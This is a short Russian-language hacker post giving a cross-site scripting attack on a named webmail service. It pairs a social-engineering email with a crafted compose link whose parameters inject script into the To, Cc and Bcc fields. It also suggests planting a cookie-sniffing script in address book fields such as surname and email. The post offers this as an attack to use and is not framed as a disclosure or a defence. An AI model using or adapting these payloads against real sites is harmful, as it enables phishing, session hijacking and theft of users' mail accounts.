Юзаем свои неисчерпаемые навыки соц. инженерии. Пишем в виде хтмл письмо с содержанием типа:


...бла-бла-бла... НАпиши мне! написать по-быстрому мона тут:


< a href='http://mail.telegraf.by/compose.pl?func=new&To=[_наше мыло_]"><script>alert("xaxa")</script><input type="text&Cc=[">XSS]&Bcc=[">XSS]&back=abook.pl&f=open'>ТУТ!</a>

откроется страничка в которой в поле для КОМУ будет наше мыло. А тем временем вылетит алерт =) (ха, а алерт ли нам нужен? )


Ещё заходим в адресную книгу и там заполняем поля фамилия, имя, мыло любимым скриптом для вставки сниффера